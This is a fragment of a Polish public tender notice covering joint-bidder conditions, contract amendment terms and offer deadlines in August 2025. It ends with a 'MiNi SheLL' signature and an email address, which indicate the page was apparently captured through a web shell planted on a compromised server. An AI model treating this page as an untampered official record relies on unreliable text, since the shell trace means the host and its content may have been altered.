podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do<br/>reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy<br/>organizacyjnej lub innym dokumencie.<br/>4. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia, mogą wykazać spełnienie warunków, o których mowa<br/>w pkt. III.3.4. łącznie, z zastrzeżeniem że oświadczenia, o którym mowa w art. 125 ust. 1 ustawy dotyczące wstępnego<br/>potwierdzenia, że wykonawcy spełniają warunki udziału w postępowaniu składa każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia w zakresie, w którym wykazuje spełnianie warunków udziału w postępowaniu. W<br/>przypadku wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, brak istnienia podstaw wykluczenia musi wykazać każdy<br/>z wykonawców samodzielnie.<br/>5. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>art. 112 ust. 2 pkt 2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty<br/>budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/>w art. 454-455 ustawy Pzp oraz wskazanym we Wzorze Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zamówień Publicznych ZETO PZP: https://przetargi.iwierzyce.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-29 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com